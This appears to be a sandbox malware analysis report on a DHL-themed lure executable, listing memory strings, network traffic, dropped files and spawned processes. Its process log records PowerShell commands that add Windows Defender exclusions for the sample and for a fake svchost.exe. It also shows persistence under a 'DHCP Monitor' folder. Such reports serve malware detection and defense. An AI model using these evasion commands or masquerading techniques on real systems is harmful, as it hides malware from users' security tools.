Source: DHL_document11022020680908911.exe, 00000000.00000002.296593502.0000000003035000.00000004.00000001.sdmp	String found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
Source: DHL_document11022020680908911.exe, 00000000.00000002.296593502.0000000003035000.00000004.00000001.sdmp	String found in binary or memory: https://myliverpoolnews.cf4=k
Source: svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	String found in binary or memory: https://quantcast.mgr.consensu.org
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://reachplc.hub.loginradius.com"
Source: DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	String found in binary or memory: https://s2-prod.liverpool.com
Source: svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	String found in binary or memory: https://s2-prod.liverpool.com/
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://s2-prod.mirror.co.uk/
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.315276492.000002886D613000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000003.289025096.000002886D632000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.311553816.000002886D640000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000003.289025096.000002886D632000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000011.00000003.311901316.000002886D63B000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000011.00000003.310953123.000002886D64A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://trinitymirror.grapeshot.co.uk/
Source: DHL_document11022020680908911.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
Source: svchost.exe, 00000023.00000003.461376428.000001EB103BA000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000023.00000003.461376428.000001EB103BA000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/champions-league
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
Source: svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/premier-league
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000003.240448674.0000000006EC2000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.371893373.00000000069B2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/transfers
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
Source: svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
Source: svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
Source: svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
Source: svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/schedule/
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/search/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: DHL_document11022020680908911.exe, 00000000.00000002.294586472.000000000145B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: DHL_document11022020680908911.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: DHL_document11022020680908911.exe

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

File created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx

Jump to behavior

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Code function: 0_2_02FB2718
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Code function: 0_2_02FB2E90

Source: DHL_document11022020680908911.exe

Static PE information: invalid certificate

Source: DHL_document11022020680908911.exe, 00000000.00000003.229076348.00000000014D9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs DHL_document11022020680908911.exe
Source: DHL_document11022020680908911.exe, 00000000.00000002.296330308.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs DHL_document11022020680908911.exe
Source: DHL_document11022020680908911.exe, 00000000.00000002.294586472.000000000145B000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL_document11022020680908911.exe
Source: DHL_document11022020680908911.exe, 00000000.00000002.293255563.00000000010F7000.00000004.00000010.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL_document11022020680908911.exe
Source: DHL_document11022020680908911.exe, 0000000E.00000002.287412215.00000000001E6000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename vs DHL_document11022020680908911.exe
Source: DHL_document11022020680908911.exe, 00000010.00000000.288168526.0000000000FB6000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename vs DHL_document11022020680908911.exe
Source: DHL_document11022020680908911.exe	Binary or memory string: OriginalFilename vs DHL_document11022020680908911.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: classification engine

Classification label: mal100.evad.winEXE@43/34@8/4

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

File created: C:\Program Files (x86)\DHCP Monitor

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

File created: C:\Users\user\AppData\Local\??????????????????_Inc

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4792:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{56106451-c434-463f-9b08-031bd1e7ffa5}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkjtufbf.qos.ps1

Jump to behavior

Source: DHL_document11022020680908911.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: DHL_document11022020680908911.exe

ReversingLabs: Detection: 14%

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

File read: C:\Users\user\Desktop\DHL_document11022020680908911.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL_document11022020680908911.exe 'C:\Users\user\Desktop\DHL_document11022020680908911.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document11022020680908911.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Users\user\Desktop\DHL_document11022020680908911.exe C:\Users\user\Desktop\DHL_document11022020680908911.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Users\user\Desktop\DHL_document11022020680908911.exe C:\Users\user\Desktop\DHL_document11022020680908911.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe'
